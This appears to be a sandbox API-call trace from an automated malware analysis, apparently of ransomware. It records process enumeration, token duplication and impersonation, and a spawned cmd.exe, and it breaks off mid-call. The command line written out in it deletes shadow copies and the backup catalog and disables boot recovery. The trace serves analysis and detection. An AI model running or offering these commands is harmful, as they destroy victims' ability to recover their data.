[0112.369] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.369] CloseHandle (hObject=0x2f4) returned 1 [0112.369] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.369] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x2f4 [0112.369] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.369] CloseHandle (hObject=0x2f4) returned 1 [0112.369] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.370] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x2f4 [0112.370] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.370] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.370] DuplicateToken (in: ExistingTokenHandle=0x308, ImpersonationLevel=0x2, DuplicateTokenHandle=0x39afdd0 | out: DuplicateTokenHandle=0x39afdd0*=0x30c) returned 1 [0112.370] SetThreadToken (Thread=0x0, Token=0x30c) returned 1 [0112.370] CloseHandle (hObject=0x30c) returned 1 [0112.370] CloseHandle (hObject=0x308) returned 1 [0112.370] CloseHandle (hObject=0x2f4) returned 1 [0112.370] CloseHandle (hObject=0x13c0) returned 1 [0112.371] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0112.371] wsprintfW (in: param_1=0x39afb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0112.371] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x39afd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x39afd28) returned 0xffffffff [0112.371] RtlExitUserThread (Status=0x0) Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x26a73000" os_pid = "0x754" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x2a8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x4fc [0076.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfe10 | out: lpSystemTimeAsFileTime=0x1cfe10*(dwLowDateTime=0x74b8bf00, dwHighDateTime=0x1d6047d)) [0076.633] GetCurrentProcessId () returned 0x754 [0076.633] GetCurrentThreadId () returned 0x4fc [0076.633] GetTickCount () returned 0x114bebe [0076.633] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfe18 | out: lpPerformanceCount=0x1cfe18*=19673487738) returned 1 [0076.637] GetModuleHandleW (lpModuleName=0x0) returned 0x4a0a0000 [0076.637] __set_app_type (_Type=0x1) [0076.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0c7810) returned 0x0 [0076.637] __getmainargs (in: _Argc=0x4a0ea608, _Argv=0x4a0ea618, _Env=0x4a0ea610, _DoWildCard=0, _StartInfo=0x4a0ce0f4 | out: _Argc=0x4a0ea608, _Argv=0x4a0ea618, _Env=0x4a0ea610) returned 0 [0076.638] GetCurrentThreadId () returned 0x4fc [0076.638] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4fc) returned 0x3c [0076.842] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0076.843] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0076.843] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0076.843] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.843] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfda8 | out: phkResult=0x1cfda8*=0x0) returned 0x2 [0076.843] VirtualQuery (in: lpAddress=0x1cfd90, lpBuffer=0x1cfd10, dwLength=0x30 | out: lpBuffer=0x1cfd10*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0076.843] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfd10, dwLength=0x30 | out: lpBuffer=0x1cfd10*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0076.843] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfd10, dwLength=0x30 | out: lpBuffer=0x1cfd10*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0076.843] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cfd10, dwLength=0x30 | out: lpBuffer=0x1cfd10*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0076.844] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfd10, dwLength=0x30 | out: lpBuffer=0x1cfd10*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0076.844] GetConsoleOutputCP () returned 0x1b5 [0076.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0dbfe0 | out: lpCPInfo=0x4a0dbfe0) returned 1 [0076.844] SetConsoleCtrlHandler (HandlerRoutine=0x4a0c3184, Add=1) returned 1 [0076.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.844] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.845] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.845] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0ce194 | out: lpMode=0x4a0ce194) returned 1 [0076.845] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.845] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.845] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.845] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0ce198 | out: lpMode=0x4a0ce198) returned 1 [0076.846] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.846] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.846] GetEnvironmentStringsW () returned 0x328cf0* [0076.846] GetProcessHeap () returned 0x310000 [0076.846] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xa7c) returned 0x329780 [0076.846] FreeEnvironmentStringsW (penv=0x328cf0) returned 1 [0076.846] GetProcessHeap () returned 0x310000 [0076.847] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x8) returned 0x328b70 [0076.847] GetEnvironmentStringsW () returned 0x328cf0* [0076.847] GetProcessHeap () returned 0x310000 [0076.847] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xa7c) returned 0x32a210 [0076.847] FreeEnvironmentStringsW (penv=0x328cf0) returned 1 [0076.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec68 | out: phkResult=0x1cec68*=0x44) returned 0x0 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x18, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x1, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x1, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x0, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x40, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x40, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.847] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x40, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.848] RegCloseKey (hKey=0x44) returned 0x0 [0076.848] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec68 | out: phkResult=0x1cec68*=0x44) returned 0x0 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x40, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x1, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x1, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x0, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x9, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x4, lpData=0x1cec80*=0x9, lpcbData=0x1cec64*=0x4) returned 0x0 [0076.848] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec60, lpData=0x1cec80, lpcbData=0x1cec64*=0x1000 | out: lpType=0x1cec60*=0x0, lpData=0x1cec80*=0x9, lpcbData=0x1cec64*=0x1000) returned 0x2 [0076.848] RegCloseKey (hKey=0x44) returned 0x0 [0076.848] time (in: timer=0x0 | out: timer=0x0) returned 0x5e7e6df9 [0076.848] srand (_Seed=0x5e7e6df9) [0076.848] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet" [0076.848] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet" [0076.849] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0dc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.849] GetProcessHeap () returned 0x310000 [0076.849] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x32aca0 [0076.849] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32acb0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0076.849] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.849] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.849] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.849] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.849] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.849] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.849] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.849] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.849] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.850] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.850] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.850] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.850] GetProcessHeap () returned 0x310000 [0076.850] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x329780 | out: hHeap=0x310000) returned 1 [0076.850] GetEnvironmentStringsW () returned 0x328cf0* [0076.850] GetProcessHeap () returned 0x310000 [0076.850] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xa94) returned 0x32aec0 [0076.850] FreeEnvironmentStringsW (penv=0x328cf0) returned 1 [0076.850] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.850] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.850] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.850] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.850] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.850] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.850] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.850] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.850] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.850] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.851] GetProcessHeap () returned 0x310000 [0076.851] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x5c) returned 0x32b960 [0076.851] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa70, lpFilePart=0x1cfa50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cfa50*="Desktop") returned 0x25 [0076.851] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.851] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf780 | out: lpFindFileData=0x1cf780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x32b9d0 [0076.851] FindClose (in: hFindFile=0x32b9d0 | out: hFindFile=0x32b9d0) returned 1 [0076.851] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf780 | out: lpFindFileData=0x1cf780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x32b9d0 [0076.851] FindClose (in: hFindFile=0x32b9d0 | out: hFindFile=0x32b9d0) returned 1 [0076.852] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf780 | out: lpFindFileData=0x1cf780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x61b41800, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0x61b41800, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x32b9d0 [0076.853] FindClose (in: hFindFile=0x32b9d0 | out: hFindFile=0x32b9d0) returned 1 [0076.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.853] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.853] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.853] GetProcessHeap () returned 0x310000 [0076.853] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aec0 | out: hHeap=0x310000) returned 1 [0076.853] GetEnvironmentStringsW () returned 0x32b9d0* [0076.854] GetProcessHeap () returned 0x310000 [0076.854] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xae8) returned 0x32c4c0 [0076.855] FreeEnvironmentStringsW (penv=0x32b9d0) returned 1 [0076.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0dc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.855] GetProcessHeap () returned 0x310000 [0076.855] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b960 | out: hHeap=0x310000) returned 1 [0076.855] GetProcessHeap () returned 0x310000 [0076.855] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4016) returned 0x32cfb0 [0076.855] GetProcessHeap () returned 0x310000 [0076.855] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x19e) returned 0x3297e0 [0076.855] GetProcessHeap () returned 0x310000 [0076.855] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32cfb0 | out: hHeap=0x310000) returned 1 [0076.855] GetConsoleOutputCP () returned 0x1b5 [0076.856] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0dbfe0 | out: lpCPInfo=0x4a0dbfe0) returned 1 [0076.856] GetUserDefaultLCID () returned 0x409 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0d7b50, cchData=8 | out: lpLCData=":") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb80, cchData=128 | out: lpLCData="0") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb80, cchData=128 | out: lpLCData="0") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb80, cchData=128 | out: lpLCData="1") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0ea740, cchData=8 | out: lpLCData="/") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0ea4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0ea460, cchData=32 | out: lpLCData="Tue") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0ea420, cchData=32 | out: lpLCData="Wed") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0ea3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0ea3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0ea360, cchData=32 | out: lpLCData="Sat") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0ea700, cchData=32 | out: lpLCData="Sun") returned 4 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0d7b40, cchData=8 | out: lpLCData=".") returned 2 [0076.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0ea4e0, cchData=8 | out: lpLCData=",") returned 2 [0076.858] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.858] GetProcessHeap () returned 0x310000 [0076.858] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x20c) returned 0x329a00 [0076.859] GetConsoleTitleW (in: lpConsoleTitle=0x329a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0076.859] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0076.859] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0076.859] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0076.859] GetProcessHeap () returned 0x310000 [0076.859] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4012) returned 0x32cfb0 [0076.860] GetProcessHeap () returned 0x310000 [0076.860] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32cfb0 | out: hHeap=0x310000) returned 1 [0076.860] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0076.860] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0076.860] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0076.860] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0076.860] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0076.861] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0076.861] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0076.861] GetProcessHeap () returned 0x310000 [0076.861] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x329c20 [0076.861] GetProcessHeap () returned 0x310000 [0076.861] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x22) returned 0x324820 [0076.861] GetProcessHeap () returned 0x310000 [0076.861] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4a) returned 0x329ce0 [0076.862] GetProcessHeap () returned 0x310000 [0076.862] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x329d40 [0076.863] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0076.863] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0076.863] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0076.863] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0076.863] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0076.863] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0076.863] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0076.863] GetProcessHeap () returned 0x310000 [0076.863] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x329e00 [0076.863] GetProcessHeap () returned 0x310000 [0076.863] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x1a) returned 0x324850 [0076.864] GetProcessHeap () returned 0x310000 [0076.864] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x38) returned 0x326760 [0076.864] GetProcessHeap () returned 0x310000 [0076.865] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x329ec0 [0076.865] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0076.865] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0076.865] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0076.865] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0076.865] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0076.865] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0076.866] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0076.866] GetProcessHeap () returned 0x310000 [0076.866] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0) returned 0x329f80 [0076.866] GetProcessHeap () returned 0x310000 [0076.866] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 